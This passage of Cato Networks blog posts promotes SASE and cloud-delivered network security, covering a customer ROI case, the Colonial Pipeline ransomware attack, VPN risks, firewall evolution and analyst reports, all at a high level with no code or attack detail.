risk. In particular, the company wasn‘t applying new features or security patches to its network, which created a technical deficit and high risk. The IT team wanted better performance, cost savings, stronger security, resilience in the infrastructure, agility and scalability, and the ability to monitor what is happening on the network. The company‘s Cato deployment began nearly a year ago. The company expects to be entirely switched over to Cato by Q1 of 2022. Meanwhile, the company’s IT manager shared with us they’ve already realized the following savings attributed to easier network operations and management. The ROI elements involved both time savings as well as productivity or functionality benefits they gained by moving to Cato:   Cato automatically applies security patches and feature updates, so there is no time required on the company‘s part to do this work. Previously, patches and updates were not managed by anyone, which posed a high risk. Even one significant breach could have resulted in millions of euros in fines and business losses.  Cato now manages the network firewall and security, inspecting east/west traffic and reducing risk for the company. IT only allocates about one hour of effort per month.  Having replaced the SWG service provider, Cato now manages the external security, including Internet firewall, secure web gateway, intrusion prevention, and anti-malware. Previously the company spent at least four hours per month on this effort, and now the time is reduced to just one hour per month. In addition, Cato‘s internal security is fully native to the network, not an external add-on solution.  The company troubleshoots problems using Cato‘s analytics and event discovery feature. Troubleshooting was previously difficult, if not impossible, and time-consuming, taking about five hours per month, and then with poor results. With Cato, the company spends about the same amount of time, but with much better results, and has seen huge adoption from various teams. The company now enjoys detailed reporting based on network analytics. This type of information was impossible with the old network, and it takes only two hours per month to get the information. .  Costs Have Been Reduced by Half, and Often More  All told, the company previously devoted about 120+ hours per year to operational activities to support the old network – and this is without the benefit of having strong network security – and now the company devotes about 50 hours per year to network management and operations. This includes WAN and Internet zero-day protection that they didn‘t have before. The result is about 60 to 70 percent savings of operational effort with the new Cato network. As for networking costs, the company has cut its telecom bill for the WAN in half and also reduced SWG security by half. This has resulted in substantial financial savings for a more manageable, more secure global network. [caption id="attachment_15746" align="alignnone" width="2560"] The enterprise replaced a telco bundle of MPLS, Internet, and a SWG service with Cato, reducing operation costs by up to 70% while improving security and troubleshooting.[/caption]   The Cato Network Provides Additional Benefits  In addition to the savings, the company has also identified other benefits by switching to Cato, including: • Better network performance for all sites • Alignment with IT governance • Better alignment with business needs • Resilience from having a minimum of two links per site • Agility and scalability • Complete visibility of what‘s happening on the network • Strong user and business adoption • Strong integrated and unified security • Monitoring, reporting, and alerting on issues • Futureproof – ready for Cloud, VoIP, Video, and more In short, the company is pleased with its new network, and Cato is pleased to be of service to them. If your organization struggles with some of these same issues and wants a better ROI from your network, contact us to learn how Cato can help.   

Targeting critical infrastructure has critical implications

The ransomware group that targeted the Colonial Pipeline claims they are in it for the money, not for a political reason. An interesting predicament for the attackers, defenders and the future of such attacks. The recent ransomware attack on Colonial Pipeline is yet another brutal reminder of the implications of cyber security breaches. The attack’s...
Targeting critical infrastructure has critical implications The ransomware group that targeted the Colonial Pipeline claims they are in it for the money, not for a political reason. An interesting predicament for the attackers, defenders and the future of such attacks. The recent ransomware attack on Colonial Pipeline is yet another brutal reminder of the implications of cyber security breaches. The attack’s effect was immediate – the pipeline was shutdown resulting in fear of a spike in gas prices. In addition, a state of emergency declaration for 17 states allows truck drivers to do more extra hours and get less sleep. While the investigation of the attack is still ongoing, there has been an interesting development in the form of an announcement by the threat actor, DarkSide. In a statement by the group, they claim they are an apolitical group interested in money and not social disruption. In addition, they promise to start checking every company prior to targeting and ransoming it to avoid such cases in the future. his announcement is interesting for several reasons. First off, it is almost a standard procedure for organizations that have been breached to claim it was a nation state actor that conducted the attack. This helps with mitigating calls for taking full responsibility over the attack because it widely agreed upon that a nation state actor is nearly impossible to stop and prevent their actions. With DarkSide announcing they are an “apolitical” group and specifically saying “do not need to tie us with a defined government” (sic) using this excuse goes out the window. This begs the question – why did DarkSide feel the need to announce this? This ransomware group has targeted dozens of companies in the past, what is different now? The answer to that is – the target! DarkSide targeted a critical infrastructure and they might have just realized what that means. It means they are not up against an organization’s SOC, they are up against the federal government. Multiple three letter agencies will now be involved in the investigation, and as demonstrated in the past, this can have consequences to the ransomware operation and operators. It seems the group is genuinely concerned as the announcement also states they will make sure that in the future they don’t target systems that which have “social consequences.” So where do things stand now? While DarkSide claims they will avoid similar targets in the future, it is clear that critical systems will be targeted not just by nation states, but by groups looking to make monetary gains. The “it’s a nation state actor” approach might be off the table for some types of attacks, on the other hand, this also looks like a golden chance for nation state actors to hide their operations under the mascaraed of a ransomware attack. This has already been done in the past…The Liar’s Dividend is something threat actors are happy to take advantage of.  

How A Philosophy of Agility Led to Our New MSP-Centric Partner Program

Today, we announced the expansion of our Global Partner Program with an eye on helping MSPs and channel partners everywhere benefit from the power of SASE. From its inception, Cato focused on solving the problems caused by the complexity and rigidity of legacy IT infrastructure. The result was a new kind of infrastructure, one that brought the...
How A Philosophy of Agility Led to Our New MSP-Centric Partner Program Today, we announced the expansion of our Global Partner Program with an eye on helping MSPs and channel partners everywhere benefit from the power of SASE. From its inception, Cato focused on solving the problems caused by the complexity and rigidity of legacy IT infrastructure. The result was a new kind of infrastructure, one that brought the agility and simplicity of the cloud to network and security. Years later, this approach would be called SASE, but when it was introduced back in 2015, it was just called "groundbreaking." We brought that same philosophy to our channel partner program. The Cato Networks Global Partner Program was built to eliminate the red tape and help the channel be profitable. We introduced Flex Orders, Flexible Billing, Assured Margins, and more all aimed at simplifying life for our partners and helping them be more competitive. You see, more than the features that make Cato's program unique is the philosophy. Our motivation and ability to change things around to make our partners' future brighter and their day-to-day more effortless. Agility goes a long way when it comes to channel strategy and alignment. We've seen vendors develop complicated, cumbersome, and demanding partner programs, thinking that thousands of channel companies should change and adapt because they say so. We know that it's the other way around.   BRINGING THE POWER OF CATO TO MSPs EVERYWHERE  The updates we're making to the Cato Networks Global Partner Program today once again embody this philosophy. We're bringing better deal protection, enhanced discounts, assured margins on highly competitive deals, and we're delivering more agility, especially for partners that sell Cato as a managed service. For the past two years, we thoroughly evaluated MSP and partner needs and challenges. We heard about channel conflict, risk hedging where they committed upfront to full deployment scope but could only bill monthly, and the challenges of maintaining profitability in competitive deals.   So we addressed partner risk and profitability with, you guessed it, greater agility. With 'Flex Orders,' we eased financing and lowered the risk on our partners. Our 'Assured Margins Program' (AMP) guarantees a minimum gross margin to our partners on every deal, even in highly competitive situations. We increased the deal-reg discount and created better differentiation with new tiers. We also hired more channel managers to properly onboard these partners and work with them to build a solid mutual pipeline. We improved the partners' visibility into their SASE opportunities with the new partner portal, adding real-time and robust CRM integration and an improved pipeline management interface. The revamped partner portal also contains arguably the richest collection of SASE training materials in the world. In addition, partners can register deals and leverage co-branded content and out-of-the-box ready campaigns to generate demand and educate their customers. SASE IS HERE: WILL YOU PROFIT OR BE LEFT BEHIND?   Disruptive technologies are changing the world we're living in and the IT industry in particular. Legacy technologies are fading out, making room for something more agile, more flexible, and way faster.  The cloud has become the center of tomorrow's enterprise network. Profiting from this revolution is no longer an option for the channel; it's a must. The Cato SASE platform puts partners in the driver's seat, letting them lead the SASE revolution and futureproof their business.

How Consolidated Security Became the New Best-of-Breed

The IT Manager’s Dilemma  IT professionals are constantly making decisions regarding which security solutions they should purchase to protect their organizations. One of the most common dilemmas they face is whether to go with a consolidated, “Swiss army knife,” solution or choose a number of stand-alone, best-of-breed, products. A consolidated solution has clear advantages such as simpler integration, no interoperability risk, less expertise required to manage multiple siloed solutions and, usually, a lower...
How Consolidated Security Became the New Best-of-Breed The IT Manager’s Dilemma  IT professionals are constantly making decisions regarding which security solutions they should purchase to protect their organizations. One of the most common dilemmas they face is whether to go with a consolidated, “Swiss army knife,” solution or choose a number of stand-alone, best-of-breed, products. A consolidated solution has clear advantages such as simpler integration, no interoperability risk, less expertise required to manage multiple siloed solutions and, usually, a lower TCO. However, there has always been the notion of a tradeoff between the benefits offered by a consolidated solution, and the superior security provided by best-of-breed products. Simply put, to gain the benefits of consolidation you have to lose some degree of security.   Is Best-of-Breed Really the Best?   In a survey conducted by Dimensional Research1 among global security leaders, 69% of the respondents agreed that vendor consolidating would lead to better security.  In a recent Gartner survey2, comparing a vendor consolidation strategy versus a best-of-breed approach to security solutions procurement, 41% of respondents stated that the primary benefit they’ve seen from consolidating their security solutions was an improvement in their organizational risk posture. It’s not that the other 59% didn’t view it as a benefit, they just didn’t see it as the primary one.   This might seem counter intuitive. Best-of-breed literally means getting the best product for each security category. Logically this should lead to the best overall security posture. So how have we arrived at a reality where a growing number of IT leaders believe that a consolidated whole is greater than the sum of its best-of-breed counterparts?      What Makes Consolidation More Secure?  There a several reasons why a consolidated solution leads to a better security posture:   When More Becomes Less. Deploying a large number of stand-alone solutions requires the IT team to have the necessary expertise to manage, capacity plan, monitor, an carry out software updates and security patching, for all those different products. The greater the number of products, the thinner the IT team is spread, increasing the risk of a device, service, or security policy misconfiguration and greater vulnerability. According to a survey conducted by IDC5, misconfiguration is the number one cause of cloud security breaches. More products mean more complexity and more room for error, ultimately leading to a less robust security posture.   Big Targets Are Easier to Hit. The greater the number of products, the greater the diversity of operating systems, OS versions, drivers, and third-party software. This directly translates into a greater accumulative attack surface and more opportunities for bad actors to breach your network and assets. As far as security is concerned, the more the scarier.  One for All. Separate stand-alone products typically require separate management systems, which can lead to security gaps caused by duplicate, and sometimes inconsistent, configurations of the different security engines. Single-pane-of-glass management promotes coherence and better visiblity, which contributes to improved protection.   All for One. A solution consisting of stand-alone products is typically stitched together via service chaining, in which the security engines process traffic one after the other. A truly consolidated solution leverages a single-pass architecture, in which, security engines process traffic in parallel with a unified single context. This facilitates one fully informed decision instead of a series of half-blind ones, and greatly enhances security coverage.  Simple is the New Black. When evaluating a solution, it is easy to get excited about all the bells and whistles included in a best-of-breed product. It is, however, important to have an objective and pragmatic understanding of what you actually need. A recent report published by Pendo.io3 reveals that 80% of software features are either never or rarely used. When a thin-spread IT team is at the helm of a large number of disjoint products, an unnecessary configuration option can quickly turn into a liability. In a recent report4, Gartner wrote “After decades of focusing on network performance and features, future network innovation will target operational simplicity, automation, reliability and flexible business models”. Keeping things simple helps keep them secure.  Word of Warning: Single vendor doesn’t always mean consolidated  There is an important distinction we should make between a truly consolidated solution and a single-vendor solution composed of separate products, often obtained through a merger or acquisition. Although the latter are sold by a single vendor, they are still, more often than not, separate solutions with separate management. As such, they do not reap the above benefits.  What’s Next?  The ever-evolving cyber-threat landscape is creating a continuous need to adopt new security solutions in order to keep our networks and IT assets protected. Each organization has a tipping point at which the number of products they bring on board becomes too complex to handle and begins to hinder their security posture. As a growing number of IT leaders come to realize this, the demand for simple, coherent, consolidated solutions will continue to grow and become their de-facto go-to security strategy.   No longer are security and consolidation on opposite sides of the trade-off scales. They are, in fact, growing increasingly synonymous.     1 Why Cyber Security Consolidation Matters – Dimensional Research, published by Checkpoint.  2 Security Vendor Consolidation Trends - Should You Pursue a Consolidation Strategy? – Gartner  3The 2019 Feature Adoption Report – Pendo.io  4 Strategic Roadmap for Networking 2019 – Gartner  5 IDC Security Survey of 300 CISOs – IDC 2020   

What is a Cloud Firewall?

Cracks are forming at the base of the cloud firewall. Those virtualized instances of the security perimeter vital to protecting cloud assets against unauthorized attempts to access an organization’s cloud resources have begun showing their age. The shift to multicloud strategies and the rapid evolution of network-based threats are uncovering weaknesses in cloud firewalls. Instead,...
What is a Cloud Firewall? Cracks are forming at the base of the cloud firewall. Those virtualized instances of the security perimeter vital to protecting cloud assets against unauthorized attempts to access an organization’s cloud resources have begun showing their age. The shift to multicloud strategies and the rapid evolution of network-based threats are uncovering weaknesses in cloud firewalls. Instead, many companies are adopting Firewall-as-a-Service (FWaaS) solutions. But will FWaaS go far enough? Let’s find out. What is a Cloud Firewall Used For? Physical firewalls, aka firewall appliances, have been a fixture in the network stack populating datacenters and branch offices everywhere. But as enterprises shifted data and applications to the cloud, they needed to secure them as well. Deploying a physical firewall in the cloud was impractical at best and frequently impossible. Enter cloud firewalls. These offerings bring the protective ability of firewall appliances to the cloud. Cloud firewalls run as virtual instances within the cloud provider network. As such, cloud firewalls bring several significant advantages over firewall appliances. We’ve already discussed one; they’re easy to deploy. Cloud firewalls are also easier to scale than physical firewalls. Need more memory or compute? Just add as you would to any workload in the cloud. Cloud firewalls are also often easier to make highly available. Yes, you’ll need to configure redundant instances appropriately. But the datacenters are already equipped with redundant power sources, HVAC systems, automated backup systems, and more needed to support an HA implementation. The Limitations of Cloud Firewalls At the same time, cloud firewalls come with key limitations. With each cloud environment requiring its cloud firewall for protection, security becomes more complex in a multicloud strategy, which is increasingly common among enterprises. What’s more, where cloud firewall instances exist out-of-region, traffic must be backhauled, adding latency to application sessions. And while cloud firewalls might be easier to maintain than physical appliances, they still need plenty of care. IT teams still need to configure, deploy, and manage the cloud firewall. They still need to apply patches and deploy the latest signatures to protect against zero-day threats. Finally, resource sharing among cloud firewalls becomes challenging at scale. Cloud firewalls function as virtual appliances, requiring their memory and compute. They can’t pool them easily with other cloud firewall instances. For many IT teams, the question “What is a cloud firewall” is being replaced by “What security tool can we use instead of a cloud firewall.” Why FWaaS is Replacing Virtual Firewalls And the answer to that question is quickly becoming FWaaS. FWaaS offerings are independent cloud services that provide companies with their own firewall instances to manage and run. Unlike firewalls, FWaaS provide customers their own logical firewall instances running on the provider’s multitenant firewall platform. FWaaS platforms are genuine cloud services. They’re multitenant, elastic, and highly scalable, allowing the individual firewalls to consume compute resources more efficiently than individual cloud firewalls. FWaaS providers also assume the burden of ensuring firewall performance doesn’t suffer as traffic loads grow. And since compute resources and operating costs are spread across all customers, FWaaS platforms are often more cost-effective than cloud firewalls. In short, by using FWaaS, organizations retain the scalability, availability, and extensibility of a cloud deployment. At the same time, they enjoy the low-cost cloud option and improved line-rate network performance. Does FWaaS Go Far Enough? FWaaS might seem to answer the security problems facing enterprises, but what they miss is the global network. Most enterprises have at least some resources in private datacenters. Users require optimized access to those resources and the cloud. FWaaS offerings, though, rely on the unpredictable global Internet for transport. Performance to corporate datacenters is far too unpredictable and sluggish for enterprises used to the MPLS and private backbones. FWaaS offerings also often target HTTP-based applications. Other applications based around legacy protocols may not be supported or require purchasing additional products. Since FWaaS offerings can’t cover the complete enterprise, they must be integrated with existing networking and security tools. This creates greater operational complexity for IT and leads to fragmented network visibility, complicating the detection of the network traffic patterns indicating malware infections. In short, FWaaS steps in the right direction but without the underlying network remains a partial solution. For most enterprises, FWaaS doesn’t go far enough. Moving from Cloud Firewall to SASE Secure Access Service Edge (SASE) expands on FWaaS, converging security with a global, optimized network. The Cato SASE platform, for example, includes the Cato Global Private Backbone, a global, geographically distributed, SLA-backed network of 60+ PoPs interconnected by multiple tier-1 carriers. Within those PoPs, a complete suite of security services — NGFW, IPS, URLF, anti-malware, and more — operate on all traffic. The traffic is then sent onto the Internet or across the Cato global private backbone to other edges — branch offices, datatcenters, remote users, and cloud resources — connected to Cato PoPs. The Cato network includes built-in WAN optimization, route optimization, dynamic carrier selection, and cloud optimization to deliver far better performance than the global Internet or legacy infrastructure. During customer testing, for example, file transfer performance improved by 20x with Cato when compared against MPLS. Other customers have seen similar, if not better results, when comparing Cato against the global Internet. The convergence of security and networking also provides Cato with unprecedented visibility into enterprise traffic flows. Using this unique insight, a team of dedicated networking and security experts seamlessly and continuously update Cato defenses. They offload the burden from enterprises of ensuring maximum service availability, optimal network performance, and the highest level of protection against emerging threats. It’s Time to Upgrade your Cloud Firewall with SASE Cato is the world’s first SASE platform. It enables customers to easily connect physical locations, cloud resources, and mobile users to Cato and provides IT teams with a single, self-service console to manage security services. Learn more on our blogs, contact our team of security experts, or schedule a demo to see how SASE can protect your network environment.        

Remote Access Security: The Dangers of VPN

Millions of people worldwide are still working remotely to support shelter-in-place requirements brought on by the pandemic. For many workers, a remote workstyle is a preference that will likely become a more permanent arrangement. Enterprises have responded by expanding their use of VPNs to provide remote access to the masses, but is this the right choice for long-term access?  Aside from enabling easy connectivity,...
Remote Access Security: The Dangers of VPN Millions of people worldwide are still working remotely to support shelter-in-place requirements brought on by the pandemic. For many workers, a remote workstyle is a preference that will likely become a more permanent arrangement. Enterprises have responded by expanding their use of VPNs to provide remote access to the masses, but is this the right choice for long-term access?  Aside from enabling easy connectivity, enterprises also must consider the security of VPNs and whether their extensive use poses risks to the organization. (Spoiler alert: they do.) Long-term use alternatives must be considered due to VPNs’ failures where remote access security is concerned. One prominent alternative is Secure Access Service Edge (SASE) platforms with embedded Zero Trust Network Access (ZTNA) that alleviate the security dangers and other disadvantages of VPN.  VPNs Put Remote Access Security at High Risk In general, VPNs provide minimal security with traffic encryption and simple user authentication. Without inherent strong security measures, they present numerous risk areas:  VPN users have excessive permissions – VPNs do not provide granular user access to specific resources. When working remotely via VPN, users access the network via a common pool of VPN-assigned IP addresses. This leads to users being able to “see” unauthorized resources on the network, putting them only a password away from being able to access them.  Simple authentication isn’t enough– VPNs do provide simple user authentication, but stronger authentication of users and their devices is essential. Without extra authentication safeguards – for example, multi-factor authentication, or verification against an enterprise directory system or a RADIUS authentication server – an attacker can use stolen credentials and gain broad access to the network.  Insecure endpoints can spread malware to the network – There is no scrutiny of the security posture of the connecting device, which could allow malware to enter the network.  The full security stack doesn’t reach users’ homes– Enterprises have built a full stack of security solutions in their central and branch offices. This security doesn’t extend into workers’ homes. Thus, to maintain proper security, traffic must be routed through a security stack at the VPN’s terminus on the network. In addition to inefficient routing and increased network latency, this can result in having to purchase, deploy, monitor, and maintain security stacks at multiple sites to decentralize the security load.  VPN appliances are a single point of failure – For enterprises that support a large remote workforce connecting via VPN, there is high risk of business interruption if a VPN fails or is incapacitated, such as through a DoS attack. No appliance means no access for anyone who would connect to it.  Some VPNs have known vulnerabilities – Enterprises are responsible for monitoring for vulnerabilities and updating and patching devices as needed. Serious flaws that go unpatched can put organizations at risk. For example, in March 2020, it was reported that Iranian hackers were leveraging VPN vulnerabilities to install backdoors in corporate and government networks. The attack campaign targeted several high-profile brands of VPNs.   VPNs add to overall network complexity – Adding one or more VPNs to the data center to manage and configure adds to the overall complexity of network management, which could ultimately lead to greater security vulnerabilities.   Network managers have limited visibility into VPN connections – The IT department has no visibility into what is happening over these appliances. The user experience suffers when problems occur, and no one knows the root cause.  Split tunneling provides opportunity for attack – To alleviate VPN capacity constraints, organizations sometimes utilize split tunneling. This is a network architecture configuration where traffic is directed from a VPN client to the corporate network and also through a gateway to link with the Internet. The Internet and corporate network can be accessed at the same time. This provides an opportunity for attackers on the shared public network to compromise the remote computer and use it to gain network access to the internal network.  VPNs Have Other Drawbacks In addition to the security issues, VPNs have other drawbacks that make them unsuitable for long-term remote access connectivity. For example, an appliance has capacity to support a limited number of simultaneous users. Ordinarily this isn’t a problem when companies have 10% or less of their employees working remotely, but when a much higher percentage of workers need simultaneous and continuous access, VPN capacity can be quickly exceeded. This requires the deployment of more and/or larger appliances, driving costs and management requirements up considerably. Companies use workarounds like split tunneling to address lack of scalability, which can degrade traffic visibility and security.  A Better Long-term Solution for Secure Remote Access VPNs are no longer the only (or best) choice for enterprise remote access. Gartner’s Market Guide for Zero Trust Network Access (ZTNA) projected that by 2023, 60% of enterprises will phase out VPN and use ZTNA instead. The main driver of ZTNA adoption is the changing shape of enterprise network perimeters. Cloud workloads, work from home, mobile, and on-premises network assets must be accounted for, and point solutions, such as VPN appliances, aren’t the right tool for the job.  The main advantage of ZTNA is its granular control over who gains and maintains network access, to which specific resources, and from which end user devices. Access is granted on a least-privilege basis according to security policies.   But Zero Trust is only one part of a remote access solution. There are performance and ongoing security issues that aren't addressed by ZTNA standalone offerings.  For example, all traffic still needs to undergo security inspection before proceeding to its destination. This is where having ZTNA fully integrated into a Secure Access Service Edge (SASE) solution is most beneficial.   SASE converges ZTNA, NextGen firewall (NGFW), and other security services along with network services such as SD-WAN, WAN optimization, and bandwidth aggregation into a cloud-native platform. Enterprises that leverage a SASE networking architecture receive the benefits of ZTNA, plus a full suite of converged network and security solutions that is both simple to manage and highly scalable. The Cato SASE solution provides all this in a cloud-native platform. Cato’s SASE solution enables remote users, through a client or clientless browser access, to access all business applications, via secure and optimized connection. The Cato Cloud, a global cloud-native service, can scale to accommodate any number of users without deploying a dedicated VPN infrastructure. Remote workers connect to the nearest Cato PoP – there are more than 60 PoPs worldwide – and their traffic is optimally routed across the Cato global private backbone to on-premises or cloud applications. Cato’s security services protect remote users against threats and enforces application access control.  In short, the Cato SASE platform makes it quick and easy to give optimized and highly secure access to any and all remote workers. For more information on how to support your remote workforce, get the free Cato eBook Work From Anywhere for Everyone.     

New Gartner Report: 2021 Strategic Roadmap for SASE Convergence

Digitalization, work-from-anywhere, and cloud computing have accelerated SASE offerings to address the need for secure and optimized access, anytime, anywhere, and on any device. In Gartner’s new report from March 25, Neil MacDonald, Nat Smith, Lawrence Orans, and Joe Skorupa provide invaluable insights with a clear message to enterprises: “SASE is a pragmatic and compelling model that...
New Gartner Report: 2021 Strategic Roadmap for SASE Convergence Digitalization, work-from-anywhere, and cloud computing have accelerated SASE offerings to address the need for secure and optimized access, anytime, anywhere, and on any device. In Gartner’s new report from March 25, Neil MacDonald, Nat Smith, Lawrence Orans, and Joe Skorupa provide invaluable insights with a clear message to enterprises: “SASE is a pragmatic and compelling model that can be partially or fully implemented today.” And, enterprises should build a strategy for replacing legacy point products with a converged SASE platform. The migration to SASE will enable enterprises to successfully address the current and future networking and security challenges:  Shifting to cloud-delivered security to protect anywhere, anytime access to digital capabilities  Simplifying security management that has become complex due to multiple vendors, policies, and appliances   Reducing cost with MPLS replacement and SD-WAN alternative projects   Better utilizing resources and skills to overcome organizational silos and facilitate growth  Practical Advice to Follow Gartner analyzes the gaps between the future and current state of SASE offerings, and provides a strategic roadmap, migration plan, and  advice on SASE adoption over the next five years.    Short term recommendations:  Deploy ZTNA/SDP to replace legacy VPN for the remote workforce  Implement phase-out tactics for on-premises hardware in favor of SASE services  Reduce cost and complexity by leveraging converged offerings of SWGs, CASBs, and VPN  Initiate branch transformation projects to integrate cloud-based security services  Longer-term recommendations:  Consolidate SASE offerings to a single vendor or two explicitly partnered vendors  Implement ZTNA/SDP for all users, at all locations  Prefer SASE offerings that allow you to control privacy and compliance related matters  Create a sassy team of networking and security experts responsible for secure access across all edges  Strategic Assumptions to Consider  The report brings new statistics and understandings of market trends, naturally accelerated by the global crisis.  By 2024, 30% of enterprises will adopt cloud-delivered SWG, CASB, ZTNA, and FWaaS from the same vendor, up from 5% in 2020  By 2025, 60% of enterprises will have explicit strategies and timelines for SASE adoption, up from 10% in 2020  By 2023, to deliver flexible, cost-effective scalable bandwidth, 30% of enterprises will have only Internet WAN connectivity, up from 15% in 2020.           

What is a UTM Firewall and What Is Beyond It?

In theory, Universal Threat Management (UTM) platforms should have long ago promoted efficiency: collapsing many security features into a single appliance. In reality, though, UTMs often became headaches in the making, putting IT on a vicious and costly lifecycle of appliance upgrades.  How can you take the UTM’s benefits and avoid the scalability problem? Let’s take a look to find out what’s beyond the UTM and the future of network security.  Firewalls Evolve...
What is a UTM Firewall and What Is Beyond It? In theory, Universal Threat Management (UTM) platforms should have long ago promoted efficiency: collapsing many security features into a single appliance. In reality, though, UTMs often became headaches in the making, putting IT on a vicious and costly lifecycle of appliance upgrades.  How can you take the UTM’s benefits and avoid the scalability problem? Let’s take a look to find out what’s beyond the UTM and the future of network security.  Firewalls Evolve Over the Years Before the UTM, there was the basic firewall. It was a physical appliance installed at a location such as a datacenter or a branch office. All traffic passed through the firewall for basic inspection of security policies based on network information such as the type of protocol or the source/destination addresses.   Traditionally, port 80 of the firewall bore extra scrutiny because this is where web traffic came in. But as applications and networking evolved, firewalls needed to look beyond port 80 to make a determination whether or not a packet flow was malicious.   As the industry started to adopt applications and services that shared common TCP ports, simply looking at the source or destination address and the TCP information wasn’t sufficient to detect malicious traffic. This led to the development of next generation firewalls (NGFWs) that look into the application layer to determine whether or not a flow is malicious.  UTMs Converge Security into One Appliance While firewalls are essential, companies need more than just a firewall in their security quiver. They also want malware inspection, intrusion detection and prevention, content filtering, and other security measures. These functions could all be separate appliances, or they could all be brought together into a single converged appliance. This new all-in-one security device is what became known as the UTM. The concept of UTM is good—the execution, not so much. As enterprises enable more security functions and as traffic levels grow, the appliances require more processing power. Ultimately, this forces an appliance upgrade with all of the additional costs and complexity involved. Failing to do that leads to a trade-off between implementing the necessary security functions and reducing processing load to improve performance.   What’s more, placing NGFWs and UTMs in the headquarters or branch doesn’t reflect the needs of today’s business. Users operate anywhere and everywhere but they still must send all of their traffic back to these appliances for inspection, which is inefficient. The same can be said on the application side. With more users accessing resources in the cloud, first sending traffic back to a private datacenter for security inspection by the NGFW makes little sense and can damage the usability of SaaS applications.  The Future of Enterprise Security is in the Cloud There is a new and revolutionary way of delivering NGFW and other network security capabilities as a cloud service. Firewall-as-a-Service (FWaaS) truly eliminates the appliance form factor, making a full stack of network security (URL Filtering, IPS, AM, NG-AM, Analytics, MDR) available everywhere. A single, logical global firewall with a unified application-aware security policy connects the entire enterprise — all sites, remote users, and cloud resources. Gartner has highlighted FWaaS as an emerging infrastructure protection technology with a high impact benefit rating.  FWAS is an integral component of a Secure Access Service Edge (SASE) networking platform. SASE converges the functions of network and security point solutions into a unified, global cloud-native service.  Cato Has a Full Security Stack in Every PoP Cato’s cloud-native SASE architecture converges SD-WAN, a global private backbone, a full network security stack, and seamless support for cloud resources and mobile devices. Customers easily connect physical locations, cloud resources, and mobile and remote users to Cato Cloud.   Cato uses a full enterprise-grade network security stack natively built into the Cato SASE Cloud to inspect all WAN and Internet traffic. Security layers include an application-aware FWaaS, secure web gateway with URL filtering (SWG), standard and next-generation anti-malware (NGAV), and a managed IPS-as-a-Service (IPS). Cato can further secure your network with a comprehensive Managed Threat Detection and Response (MDR) service to detect compromised endpoints. Zero Trust Network Access (ZTNA) is an integral part of the platform, tying security access policy back to user identity in and out of the office.   All security layers scale to decrypt and inspect all customer traffic without the need for sizing, patching, or upgrading of appliances and other point solutions. Security policies and events are managed centrally using the self-service Cato Management Application.  The Cato SASE platform spans more than 60 global Points of Presence (PoPs) located in nearly every region of the world. Each PoP has a full security stack, ensuring that security is conveniently applied to all traffic at the PoP before going to its final destination.    The future of security is in the cloud, and it goes well beyond UTM. Cato’s SASE platform delivers that future now.  Related content: Read our guide What Is a Network Firewall?    

New Forrester Report: Merging Network and Security in the Age of Covid

If you’re looking for more incisive perspective on the trend towards merging WAN and security in the cloud, check out Forrester’s January 21 report, Introducing the Zero Trust Model for Security and Network Services by analysts David Holmes and Andre Kindness. Even if you’ve already digested Gartner’s SASE reports (and our numerous blogs), this one...
New Forrester Report: Merging Network and Security in the Age of Covid If you’re looking for more incisive perspective on the trend towards merging WAN and security in the cloud, check out Forrester’s January 21 report, Introducing the Zero Trust Model for Security and Network Services by analysts David Holmes and Andre Kindness. Even if you’ve already digested Gartner’s SASE reports (and our numerous blogs), this one is worth a read. Forrester analysts tackle the impact of the post Covid-19 enterprise where some 50 percent of employees are expected to work from home. The report also includes some keen insights on a new network and security model for the Internet of Things (IoT), in addition to mobile and cloud computing. Forrester has coined its own acronym for the future of the enterprise, the Zero Trust Edge (ZTE). The opener doesn’t pull any punches, stating that enterprise need to “Merge Security and Networking or Sunset Your Business.” The report goes on to outline the challenges on the way to ZTE. According to Forrester, the Zero Trust Edge model aspires to be a cloud- or edge-hosted full security stack and network solution. Says Forrester, “A Zero Trust edge solution securely connects and transports traffic, using Zero Trust access principles, in and out of remote sites leveraging mostly cloud-based security and networking services.” ZTE solutions must merge all those disparate security appliances and functions formerly in data centers and branch offices into the cloud where configurations can be altered, added, and deleted based on a single configuration management solution and benefit from cloud-based monitoring and analysis. A single security and network solution reduces both configuration errors and operating inefficiencies compared to multiple on-premises security appliances. Cato is mentioned prominently as the only example in the report of a cloud-delivered ZTE service. The report notes that the Cato approach “offers all the value that organizations can get from software-as-a-service solutions,” and will “fit the needs of many organizations.” It helps that Cato not only brings its unique network and security solution to branch offices, cloud services, IoT, and datacenters but to mobile and home users as well, as Forrester predicts that securing remote workers is the most compelling initial use case for ZTE. Download a free copy of the new Forrester report here.  

Industry 4.0 – Talking About a Revolution

The fourth industrial revolution – aka Industry 4.0 – represents the next phase of innovation in production processes. Industry 4.0 merges traditional systems with new digital technologies (IoT, AI, big data, AR, robotics, M2M, real-time analytics, and so on), facilitating automation, agility, and efficiency to create a world of smart manufacturing. In an Industry 4.0...
Industry 4.0 – Talking About a Revolution The fourth industrial revolution – aka Industry 4.0 – represents the next phase of innovation in production processes. Industry 4.0 merges traditional systems with new digital technologies (IoT, AI, big data, AR, robotics, M2M, real-time analytics, and so on), facilitating automation, agility, and efficiency to create a world of smart manufacturing. In an Industry 4.0 world, supply chains are completely visible and workflows are fully automated. Factories, machines, products, and processes are all smart; all connected; and all sharing data to better serve today’s sophisticated customers. This revolution is basically the digital transformation of manufacturing, with clear benefits that include better security, reduced cost, customer satisfaction, competitive differentiation, and more. Industry 4.0 was first introduced in 2011, so why all the buzz 10 years later? You guessed right, it’s none other than COVID-19 accelerating the revolution. According to Gartner, by 2024, following the pandemic, over 30% of manufacturers driving Industry 4.0 programs, will cha